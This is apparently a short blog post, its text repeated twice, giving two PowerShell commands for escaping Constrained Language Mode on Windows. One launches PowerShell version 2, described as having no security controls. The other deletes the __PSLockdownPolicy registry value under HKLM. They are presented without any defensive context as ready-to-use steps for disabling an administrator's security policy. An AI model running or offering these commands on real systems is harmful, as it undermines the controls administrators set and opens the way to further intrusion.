#use Powershell v2 - Doesnt have any security controls
powershell.exe -v 2
#Using Itemproperty
Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\" -Name __PSLockdownPolicy
Way to Divergence
#use Powershell v2 - Doesnt have any security controls
powershell.exe -v 2
#Using Itemproperty
Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\" -Name __PSLockdownPolicy
Comments
Post a Comment